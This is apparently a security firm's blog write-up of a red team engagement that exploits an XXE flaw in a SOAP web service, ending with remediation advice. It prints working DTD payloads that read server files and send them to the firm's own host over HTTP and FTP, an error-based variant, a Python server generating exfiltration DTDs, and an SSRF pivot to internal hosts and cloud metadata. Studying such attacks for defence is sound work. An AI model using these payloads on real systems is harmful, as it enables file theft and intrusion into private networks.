TL; DR

Optistream conducted a red team engagement and discovered a SOAP web service vulnerable to XXE[1] attacks
Classical exploitation techniques did not fully work as expected; deeper tests then revealed an error-based XXE that leverages the application's XML parser
This exploitation technique allowed Optistream to browse and exfiltrate, from the Internet, sensitive data stored on the client's server
Optistream provides hints to avoid such vulnerabilities

Summary

XXE (XML External Entity) represents a significant security vulnerability stemming from improper handling of external entities within XML documents by an XML parser. This flaw arises when an attacker manipulates XML messages sent to an application, such as a web service, where the parser accepts user-defined entities within these messages. XXE could allow attackers to read local files, perform denial-of-service attacks, or execute remote commands by exploiting crafted malicious entities.

In this blog post, we delve into a real-world scenario encountered during a red team engagement for one of our clients. We provide a detailed account of how we exploited an XXE vulnerability present in a SOAP web service exposed on the Internet. Despite some challenges, our persistence paid off: working from the Internet, we leveraged the vulnerability to browse the server and extract sensitive client documents.

Finding XXE

Web service discovery

It all started with a classical web fuzzing approach on an exposed Linux web server, during which we discovered an interesting endpoint located at https://target.com/redacted/wsdl.

WSDL[2] (Web Service Description Language) is a specialized document outlining the public interface and exchange format of web services based on the message-oriented SOAP[3] (Simple Object Access Protocol) protocol. It encompasses crucial details such as the endpoint where the web service is listening (https://target.com/redacted/soapsrv), descriptions of different messages (services reachable by the client), as well as specifications regarding response structures, parameters, and their respective types.

Such a description file is easily parsed with a tool like SoapUI:

WSDL exploration using SoapUI
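The same information can also be pulled out of a WSDL with a few lines of code. The sketch below is only an illustration: the trimmed WSDL and the operation names getDocument and listDocuments are hypothetical, and only the endpoint URL comes from the description above.

```python
import xml.etree.ElementTree as ET

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"
SOAP_NS = "http://schemas.xmlsoap.org/wsdl/soap/"

# Hypothetical, heavily trimmed WSDL used only for illustration.
SAMPLE_WSDL = b"""<?xml version="1.0"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
             name="Demo">
  <portType name="DemoPort">
    <operation name="getDocument"/>
    <operation name="listDocuments"/>
  </portType>
  <service name="DemoService">
    <port name="DemoPort" binding="DemoBinding">
      <soap:address location="https://target.com/redacted/soapsrv"/>
    </port>
  </service>
</definitions>
"""


def summarize_wsdl(wsdl_bytes):
    """Return (operation names, endpoint URLs) declared in a WSDL 1.1 document."""
    root = ET.fromstring(wsdl_bytes)
    # Operations may appear in both portType and binding, hence the set.
    operations = sorted(
        {op.get("name") for op in root.iter(f"{{{WSDL_NS}}}operation")}
    )
    endpoints = [a.get("location") for a in root.iter(f"{{{SOAP_NS}}}address")]
    return operations, endpoints


operations, endpoints = summarize_wsdl(SAMPLE_WSDL)
print(operations)
print(endpoints)
```

A graphical tool such as SoapUI remains more convenient for building requests; a script like this is mostly useful to enumerate operations quickly.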

SOAP, an XML-based technology, facilitates message exchange between a client and an application providing web services. For an attacker, a critical focus lies in how the application's parser processes incoming XML documents via its web service. Different programming languages and frameworks utilize various XML processing libraries such as Java SAX, PHP libxml, or .NET XmlDocument class. Notably, certain libraries, particularly older versions, may come with default configurations that lack robust security measures, granting users the freedom to manipulate XML formats and their advanced functionalities.

The next part dives into these special XML features.

XML 101

XML[4] (Extensible Markup Language) serves as a means to organize, store, and transport data in a format that's understandable both to humans and machines. It is widely used for exchanging information between different systems, especially on the web, due to its flexibility and ability to describe data hierarchically.

Within a DTD[5] (Document Type Definition), the structure of an XML document can be precisely defined. This includes defining the various elements permissible within the document and their respective construction rules.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE address [
<!ELEMENT address (name,surname,phone)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT surname (#PCDATA)>
<!ELEMENT phone (#PCDATA)>
]>
<address>
<name>John</name>
<surname>Doe</surname>
<phone>+33684339921</phone>
</address>

DTD example

XML also defines entities, which are declared within the DTD. Entities act as aliases to other data (raw strings, XML elements…) and can be used as shortcuts for text replacement within the document. For instance, some entities are already defined in the XHTML 1.0 DTD: &amp; (replaced with '&'), &lt; ('<'), etc.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY data "SOME_RANDOM_STRING">
]>
<root>
<element>&data;</element>
</root>

Example of string replacement
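To see the replacement happen, the document above can be fed to an XML parser. The sketch below uses Python's standard xml.etree.ElementTree purely as an illustration (the target application discussed in this post is a Java one); it relies on the fact that this parser expands internal entities declared in the document's own DTD.

```python
import xml.etree.ElementTree as ET

# Same document as in the example above, with an internal entity named "data".
DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY data "SOME_RANDOM_STRING">
]>
<root>
<element>&data;</element>
</root>
"""

root = ET.fromstring(DOC)
# The parser substitutes &data; before handing the text to the application.
element_text = root.find("element").text
print(element_text)
```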

The danger resides in another kind of entity called external entities. These are entities that reference content read from external resources (through the local file system or a URI). If the DTD can be controlled by an attacker and is processed by the target application, it may be possible to read the content of sensitive files or even browse the server file system.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY data SYSTEM "file:///etc/passwd">
]>
<root>
<element>&data;</element>
</root>

External entity usage

Using this payload, one can expect to receive a response from the server with an error message embedding the content of /etc/passwd. However, it's crucial to note that such behavior depends on the specific implementation of the web service.

Confirming pre-auth XXE

We were able to transmit XML messages via the SOAP protocol to the web service, allowing us to explore the elements we could manipulate within these messages.

We first had to check whether we could define a DTD that would be parsed by the application. By testing with a minimal DTD defining an entity, we confirmed that this was indeed the case.

Then we tested again with external entities:

Figure 1

Figure 2

External entities seem to be parsed by the application: when the entity bar is not defined (figure 1), the parser throws an exception, whereas when bar is properly defined (figure 2) it does not, and we are instead asked to authenticate.

In our case, the trivial exploitation technique seen above which consists of referencing a local file via an external entity did not work. The target service didn't return a valuable response, perhaps because the required authentication (see user and password parameters in previous screenshots) aborted the server-side processing prematurely. Note that despite this required authentication, our XML message is still parsed.

Out-of-band XXE

We needed another method to read and exfiltrate data from the server.

Another popular exploitation technique is called out-of-band (OOB), in which the attacker gets data out of the target network indirectly. Instead of exfiltrating the data directly in an HTTP response, the data is sent to a server controlled by the attacker through an alternative channel. This involves XML "parameter entities", which leak the contents of files through an external protocol (HTTP, FTP, DNS...) supported by the application's underlying XML library.

Leaking using HTTP

Parameter entities (PEs) serve the same purpose as other entities (i.e. shortcuts), but they are meant to be used exclusively within DTDs. PEs can be either internal or external and they cannot refer to non-XML data[6].

The technique consists of using a first PE (eval) to dynamically define a second PE (leak), tasked with performing an HTTP request. The request is crafted so that it includes the contents of the file (data PE) that we wish to leak.

A typical DTD for this exploitation looks like:

<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM 'http://srv.optistream.io:443/?x=%data;'>">
%eval;
%leak;

my.dtd

First, the data PE (embedding the content of /etc/hostname) is replaced within the eval PE definition
Then, the eval PE is evaluated and defines another PE called leak, whose task is to load external content from the attacker's server
Finally, the freshly defined leak PE is evaluated and triggers an HTTP request to our server that looks like http://srv.optistream.io:443/?x=<ETC_HOSTNAME_CONTENT>
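The three steps above can be mimicked with plain string substitution. The sketch below is not an XML parser, only a simulation of what a parser does with my.dtd; the function name simulate_expansion and the sample hostname web01 are hypothetical. It assumes the inner percent sign of the nested declaration is written as the character reference &#x25;, which the XML grammar requires inside an entity value.

```python
# Value of the eval PE as it could be written in my.dtd.
EVAL_VALUE = (
    "<!ENTITY &#x25; leak SYSTEM 'http://srv.optistream.io:443/?x=%data;'>"
)


def simulate_expansion(file_content):
    """Simulate the expansion of data, eval and leak for a given file content."""
    # Step 1: the reference %data; is replaced by the content of the file.
    with_data = EVAL_VALUE.replace("%data;", file_content)
    # Step 2: evaluating %eval; yields a new declaration; &#x25; becomes '%'.
    leak_declaration = with_data.replace("&#x25;", "%")
    # Step 3: evaluating %leak; makes the parser fetch the system identifier,
    # i.e. the quoted URL (this naive split assumes no quote in the content).
    leak_url = leak_declaration.split("'")[1]
    return leak_declaration, leak_url


declaration, url = simulate_expansion("web01")
print(declaration)
print(url)
```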

The W3C standard imposes a limitation on PE usage: they cannot be used "within markup declarations", except in the external subset[7].

To craft our HTTP request using PEs, this constraint means we need to host our malicious my.dtd file at an external location (i.e. the attacker's server) so that it is processed as an external subset.

The last step is launching the attack by referencing and evaluating our DTD in the DOCTYPE placed before the SOAP envelope.

We sent the following request to the web service:

<?xml version="1.0" encoding="ISO-8859-1" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://srv.optistream.io/my.dtd">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hom="REDACTED">
<soapenv:Header/>
<soapenv:Body>
</soapenv:Body>
</soapenv:Envelope>

XXE trigger

The crafted request leaking /etc/hostname is successfully received by our listener:

GET request leaking file content ('x' variable)
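A listener for this step can be very small. The following sketch is one possible way to log the leaked value, not the tooling used during the engagement; extract_leak, LeakHandler and the default port 8080 are hypothetical names and values, and the query parameter x is the one used in my.dtd.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def extract_leak(request_path, param="x"):
    """Return the value of the leak parameter from a request path, or None."""
    query = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    values = query.get(param)
    return values[0] if values else None


class LeakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        leaked = extract_leak(self.path)
        if leaked is not None:
            print(f"[+] leak from {self.client_address[0]}: {leaked!r}")
        # Always answer with an empty 200 so the XML parser does not hang.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


def serve(port=8080):
    """Run the listener until interrupted (not started automatically here)."""
    HTTPServer(("", port), LeakHandler).serve_forever()


if __name__ == "__main__":
    # Quick offline check of the parsing helper; call serve() to listen.
    print(extract_leak("/?x=web01"))
```

Note that parse_qs decodes percent-encoding and turns '+' into a space, so the logged value may differ slightly from the raw bytes sent by the target.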

This exploitation is tied to the HTTP protocol. Difficulties arise when we try to exfiltrate multiline (e.g. /etc/passwd) or non-ASCII files, because they produce non-compliant HTTP requests; as a result, only a small part of such files can be leaked.

Attempt 2

We then tried to exploit the OOB XXE using the FTP protocol. The principle is the same as with HTTP, but we use the FTP scheme inside the DTD instead:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM 'ftp://srv.optistream.io/%data;'>">
%eval;
%leak;

To gather the exfiltrated data, we used a purpose-built FTP server that accepts client connections and records the commands and data sent. We gave xxeserv[8] a try:

$ ./xxeftp -p 21
[*] UNO Listening...
2024/04/12 07:30:55 [*] GO XXE FTP Server - Port: 21
2024/04/12 07:31:04 [*] Connection Accepted from [REDACTED:51620]
USER: anonymous
PASS: Java10.0.2@
/root:x:0:0::
/root:
/bin
2024/04/12 07:31:04 [*] Closing FTP Connection

Corresponding network capture:

220 Staal XXE-FTP
USER anonymous
331 password please - version check
PASS Java10.0.2@
230 User logged in
TYPE I
230 more data please!
CWD root:x:0:0::
250 Directory successfully changed.
CWD root:
250 Directory successfully changed.
CWD bin
250 Directory successfully changed.
QUIT
221 Goodbye.

From the password sent by the client, we first guessed that the application uses Java 10 (no longer supported since 2018). We then observed successive CWD commands, sent each time the Java client encounters a '/' character in the exfiltrated data. At the end, the client sends a final QUIT that prematurely terminates the data exchange.

As a consequence, only part of /etc/passwd is leaked. This behavior is due to the Java version: versions up to Java 7 successfully exfiltrate multiline content, but later versions don't support such URIs.
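Since the Java client splits the leaked data on '/' and sends each piece as a CWD argument, the partial content can be rebuilt by joining those arguments again. The helper below is a small sketch of that idea; rebuild_from_ftp_log is a hypothetical name, and the input lines are the client commands from the capture above.

```python
def rebuild_from_ftp_log(client_lines):
    """Join the arguments of successive CWD commands with '/'."""
    parts = []
    for line in client_lines:
        verb, _, argument = line.partition(" ")
        if verb.upper() == "CWD":
            parts.append(argument)
    return "/".join(parts)


# Client-side commands taken from the network capture.
CAPTURE = [
    "USER anonymous",
    "PASS Java10.0.2@",
    "TYPE I",
    "CWD root:x:0:0::",
    "CWD root:",
    "CWD bin",
    "QUIT",
]

leaked = rebuild_from_ftp_log(CAPTURE)
print(leaked)
```

The result stops in the middle of the first line of /etc/passwd, which illustrates how little survives the premature QUIT.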

Error-based XXE

Make it verbose

We have shown that OOB XXE exploitation was not completely satisfying. We also observed that the authentication required by the web service could be the reason why the trivial exploitation discussed in the first part did not work either.

Another technique we had not explored yet is making the parser fail so that it returns an error before the web service asks for authentication.

We finally found a way to do it by triggering an error during XML parsing: starting from our previous malicious DTD, we crafted a URI with an unknown protocol scheme for the external entity. The underlying XML parser only offers a set of standard protocol schemes (e.g. HTTP, FTP, Gopher…), so we injected the following DTD containing an unknown scheme:

<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM 'foo:///'>">
%eval;
%leak;

This was sufficient to make the server throw an exception and, most interestingly, the error message reflected the "foo" string:

…
<faultstring>
[REDACTED] exception: java.net.MalformedURLException:no protocol: foo:///
</faultstring>
…

Within my.dtd, we tried to replace "foo" with dynamic content using an external PE, as in previous attempts:

<!ENTITY % data SYSTEM "file:///etc/hosts">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;

Still using the same XXE trigger, this time it was a success:

Parser error leaking file content

This time, the full content of a multiline file was leaked; it even worked for bigger files.

This exploitation was powerful: we could also browse the target file system by specifying directories instead of files within the data PE (e.g. file:/// to list the root directory).
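Once the file content is reflected in the fault, it can be extracted automatically from the SOAP response. The sketch below assumes the fault has the same shape as the "foo" example above, i.e. the leaked content sits between "no protocol: " and the trailing ":///"; the sample response and the function name extract_from_fault are hypothetical.

```python
import xml.etree.ElementTree as ET

MARKER = "no protocol: "
SUFFIX = ":///"

# Hypothetical response modelled on the fault shown earlier, with made-up
# /etc/hosts content in place of "foo".
SAMPLE_RESPONSE = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body><soapenv:Fault>
<faultcode>soapenv:Server</faultcode>
<faultstring>
[REDACTED] exception: java.net.MalformedURLException:no protocol: 127.0.0.1 localhost
10.0.0.5 web01
:///
</faultstring>
</soapenv:Fault></soapenv:Body>
</soapenv:Envelope>"""


def extract_from_fault(response_bytes):
    """Return the content reflected in the faultstring, or None if absent."""
    root = ET.fromstring(response_bytes)
    # Match on the local name so the element is found with or without namespace.
    fault = next(
        (el for el in root.iter() if el.tag.split("}")[-1] == "faultstring"),
        None,
    )
    if fault is None or fault.text is None:
        return None
    start = fault.text.find(MARKER)
    if start == -1:
        return None
    leaked = fault.text[start + len(MARKER):].rstrip()
    if leaked.endswith(SUFFIX):
        leaked = leaked[: -len(SUFFIX)]
    return leaked


content = extract_from_fault(SAMPLE_RESPONSE)
print(content)
```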

Scripting

We wrote a script to ease exploitation:

#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

# DTD template: {} receives the path requested by the target's XML parser
XXE_FMT = """
<!ENTITY % data SYSTEM "file://{}">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;
"""

class XXEServer(BaseHTTPRequestHandler):
    def _set_response(self, response_len):
        self.send_response(200)
        self.send_header('Content-type', 'application/octet-stream')
        self.send_header('Content-length', str(response_len))
        self.end_headers()

    def do_GET(self):
        logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
        # The URL path of the request becomes the file or directory to read
        response = XXE_FMT.format(self.path).encode('utf-8')
        self._set_response(len(response))
        self.wfile.write(response)

def run(server_class=HTTPServer, handler_class=XXEServer, port=8080):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info('Starting httpd...\n')
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    logging.info('Stopping httpd...\n')

if __name__ == '__main__':
    from sys import argv

    # Optional first argument: listening port (defaults to 8080)
    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()

Exploitation script

This tool serves a dynamically generated DTD based on the URL path of the HTTP request sent to our server; that path is the file or directory we want to read or browse on the target server.

Here, the XXE trigger is different: we need to specify the target file path within the URL of the malicious DTD hosted on our server:

<?xml version="1.0" encoding="ASCII" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://srv.optistream.io/etc/passwd">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hom="REDACTED">
<soapenv:Header/>
<soapenv:Body>
</soapenv:Body>
</soapenv:Envelope>

… and we get back full file content (in a more flexible way)!
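Building the trigger for an arbitrary path is then a matter of templating. The sketch below reuses the request shown above; build_trigger and send_trigger are hypothetical helpers, and the Content-Type header and timeout are assumptions that may need adjusting for a given web service.

```python
import urllib.error
import urllib.request

TRIGGER_FMT = """<?xml version="1.0" encoding="ASCII" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://{server}{path}">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hom="REDACTED">
<soapenv:Header/>
<soapenv:Body>
</soapenv:Body>
</soapenv:Envelope>
"""


def build_trigger(path, server="srv.optistream.io"):
    """Return the SOAP message asking the target to fetch the DTD for path."""
    if not path.startswith("/"):
        raise ValueError("path must be absolute, e.g. /etc/passwd")
    return TRIGGER_FMT.format(server=server, path=path)


def send_trigger(endpoint, path):
    """POST the trigger to the SOAP endpoint and return the raw response body."""
    request = urllib.request.Request(
        endpoint,
        data=build_trigger(path).encode("ascii"),
        headers={"Content-Type": "text/xml"},  # assumed content type
    )
    try:
        with urllib.request.urlopen(request, timeout=10) as response:
            return response.read()
    except urllib.error.HTTPError as error:
        # SOAP faults usually come back with an HTTP 500 status; keep the body.
        return error.read()


trigger = build_trigger("/etc/passwd")
print(trigger)
```

send_trigger is deliberately not called here; it would be used as send_trigger("https://target.com/redacted/soapsrv", "/etc/passwd") against a system you are authorized to test.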

From XXE to SSRF

This XXE can easily be upgraded to an SSRF (Server-Side Request Forgery) attack.

An SSRF attack allows an attacker to manipulate a vulnerable server into sending HTTP requests to another internal (or external) server, often to access sensitive information or perform unauthorized actions. The attacker exploits this vulnerability by injecting malicious URLs into requests that the vulnerable server then executes.

We simply adapted our my.dtd to make data PE point to an arbitrary URL:

<!ENTITY % data SYSTEM "https://internal.target.local">
<!ENTITY % eval "<!ENTITY &#x25; leak SYSTEM '%data;:///'>">
%eval;
%leak;

The HTML source code of the target page was then displayed:

Using XXE for SSRF attack

This would be particularly powerful in cloud environments. For instance, AWS exposes an internal endpoint (http://169.254.169.254/latest/meta-data)[9] that gives access to instance metadata and can leak sensitive information such as credentials[10].

Our pentest engagement did not take place in a cloud environment; however, XXE-based SSRF allowed us to scan the client's private network and obtain some interesting insights into the internal services running there.
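Scanning through SSRF boils down to generating one DTD per candidate URL and observing the resulting fault. The sketch below only shows the generation part; the network range 10.0.0.0/30, the ports and the function names are hypothetical, and the DTD assumes the inner percent sign is written as &#x25;.

```python
import ipaddress


def ssrf_targets(cidr, ports=(80, 8080)):
    """Return candidate internal URLs for every host and port of a range."""
    urls = []
    for host in ipaddress.ip_network(cidr).hosts():
        for port in ports:
            urls.append(f"http://{host}:{port}/")
    return urls


def build_ssrf_dtd(url):
    """Return an error-based DTD whose data PE points to url."""
    return (
        f'<!ENTITY % data SYSTEM "{url}">\n'
        "<!ENTITY % eval \"<!ENTITY &#x25; leak SYSTEM '%data;:///'>\">\n"
        "%eval;\n"
        "%leak;\n"
    )


targets = ssrf_targets("10.0.0.0/30", ports=(80,))
print(targets)
print(build_ssrf_dtd(targets[0]))
```

Each generated DTD can then be served in place of my.dtd, and the content or error reflected in the fault gives a hint about whether a service answers at that URL.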

Remediations

This vulnerability could have been avoided by implementing three different measures:

Disabling XML external entities: this fix depends on the language and underlying XML library your application uses. OWASP[11] and SonarSource[12] are good references that can guide you. For example, JDK >= 6 provides the javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING flag, which you can enable on factories through a setFeature method call to turn on secure processing of XML
Setting up authentication in front of the application: do not give an attacker any chance to interact with your application if authentication is required (i.e. reduce the attack surface). Avoid implementing authentication yourself and prefer relying on native mechanisms (JWT, SSO, WWW-Authenticate…)
Not giving error or debug information to end users: error messages are prone to leaking sensitive information (stack traces, authorization tokens…); in our case, they allowed us to retrieve server file contents. For debugging purposes, prefer a local logging system and make sure to disable any error output[13] from your web application
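As an illustration of the first measure, the strictest option is often to refuse any document that carries a DOCTYPE at all, since SOAP messages do not need one. The sketch below shows that idea with Python's standard expat bindings rather than with the Java API mentioned above; parse_without_dtd and DoctypeForbidden are hypothetical names, and the exact fix for a given application depends on its XML library.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an incoming document contains a DOCTYPE declaration."""


def parse_without_dtd(xml_bytes):
    """Parse xml_bytes, aborting as soon as a DOCTYPE declaration is seen."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat before any entity declared in the DTD is processed.
        raise DoctypeForbidden(f"DOCTYPE declaration refused: {name}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_bytes, True)
    return True


MALICIOUS = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://srv.optistream.io/my.dtd">
%dtd;
]>
<root/>
"""

print(parse_without_dtd(b"<root/>"))
try:
    parse_without_dtd(MALICIOUS)
except DoctypeForbidden as error:
    print(error)
```

In Java, the OWASP cheat sheet[11] describes the equivalent approach of disallowing DOCTYPE declarations on the parser factory.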

Links

[1] https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
[2] https://www.w3.org/TR/2001/NOTE-wsdl-20010315
[3] https://www.w3.org/TR/2000/NOTE-SOAP-20000508/
[4] https://www.w3.org/TR/xml/
[5] https://www.w3.org/TR/xml/#dt-doctype
[6] https://www.xml.com/pub/a/98/08/xmlqna2.html
[7] https://www.w3.org/TR/xml/#wfc-PEinInternalSubset
[8] https://github.com/staaldraad/xxeserv
[9] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
[10] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html
[11] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[12] https://www.sonarsource.com/blog/secure-xml-processor/
[13] https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html

RedTeam tales 0x1: Soapy xxe
